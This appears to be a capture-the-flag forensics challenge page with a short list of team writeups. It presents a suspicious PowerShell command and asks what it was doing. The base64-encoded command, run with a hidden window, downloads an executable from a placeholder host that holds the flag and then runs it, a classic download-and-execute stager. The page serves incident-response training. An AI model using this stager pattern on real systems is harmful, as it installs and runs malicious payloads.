Points: 125

Tags: base64 powershell 

Poll rating:

While investigating an incident, you identify a suspicious powershell command that was run on a compromised system ... can you figure out what it was doing?

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn

Writeups

ActionRatingAuthor team
Read writeup
1.0
Try A9ain
Read writeup
not rated
Team 23
Read writeup
3.0
R0GU3_H4CK
You need to authenticate and join a team to post writeups